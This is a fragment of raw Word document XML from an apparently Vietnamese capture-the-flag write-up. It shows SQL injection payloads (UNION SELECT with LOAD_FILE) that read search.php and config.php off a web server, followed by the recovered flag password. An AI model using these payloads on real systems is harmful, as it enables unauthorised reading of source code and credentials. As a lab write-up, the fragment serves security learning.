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0A329" w14:textId="0F5AFB0B" w:rsidR="00A91479" w:rsidRDefault="00A91479">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE3BBD5" w14:textId="1D477217" w:rsidR="00027A01" w:rsidRDefault="00A91479">
      <w:r w:rsidRPr="00A91479">
        <w:t>CNSHA' UNION SELECT NULL,LOAD_FILE("/var/www/html/search.php"),NULL,NULL-- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F661A57" w14:textId="2481D22D" w:rsidR="00A91479" w:rsidRDefault="00A91479">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05842D9C" w14:textId="43B8BFD6" w:rsidR="00A91479" w:rsidRDefault="00A91479">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21A43F4C" wp14:editId="15F345D9">
            <wp:extent cx="5943600" cy="3208020"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1066648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4823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39CA" w14:textId="4FBC0629" w:rsidR="00A91479" w:rsidRDefault="00A91479">
      <w:r>
        <w:t>Kiểm tra source code ta thấy đang include file config.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28507448" w14:textId="066F4B3E" w:rsidR="00A91479" w:rsidRDefault="00A91479">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76A62FCF" wp14:editId="50296494">
            <wp:extent cx="5943600" cy="2461260"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7981995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9957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6270" w14:textId="7E25F149" w:rsidR="00A91479" w:rsidRDefault="00A91479">
      <w:r>
        <w:t xml:space="preserve">Ta tải file config.php bằng câu lệnh </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756EE625" w14:textId="77777777" w:rsidR="00A91479" w:rsidRDefault="00A91479" w:rsidP="00A91479">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A801659" w14:textId="20417BF5" w:rsidR="00A91479" w:rsidRDefault="00A91479" w:rsidP="00A91479">
      <w:r w:rsidRPr="00A91479">
        <w:t>CNSHA' UNION SELECT NULL,LOAD_FILE("/var/www/html/</w:t>
      </w:r>
      <w:r>
        <w:t>config</w:t>
      </w:r>
      <w:r w:rsidRPr="00A91479">
        <w:t>.php"),NULL,NULL-- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE631EA" w14:textId="77777777" w:rsidR="00A91479" w:rsidRDefault="00A91479" w:rsidP="00A91479">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008B274A" w14:textId="14268C58" w:rsidR="00A91479" w:rsidRDefault="00A91479">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25E2D4CD" wp14:editId="6ED84666">
            <wp:extent cx="5943600" cy="3044190"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="142124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45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A7CD" w14:textId="0949B3BB" w:rsidR="00A91479" w:rsidRDefault="00A91479">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B80C49A" wp14:editId="6413D9E3">
            <wp:extent cx="5943600" cy="1986915"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4539398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3983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2373" w14:textId="250441AA" w:rsidR="00A91479" w:rsidRDefault="00A91479">
      <w:r>
        <w:t>P/s:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A91479">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A91479">
        <w:t>dB_pAssw0rd_iS_flag!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEA42B2" w14:textId="77777777" w:rsidR="00A91479" w:rsidRDefault="00A91479"/>
    <w:p w14:paraId="640067C2" w14:textId="77777777" w:rsidR="00A91479" w:rsidRDefault="00A91479"/>
    <w:sectPr w:rsidR="00A91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01"/>
    <w:rsid w:val="00027A01"/>
    <w:rsid w:val="00A91479"/>
    <w:rsid w:val="00E4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7DE4"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8A45D27E-0780-4227-A110-65FB6955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A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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-01-26T08:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-26T08:09:00Z</dcterms:modified>
</cp:coreProperties>
</file>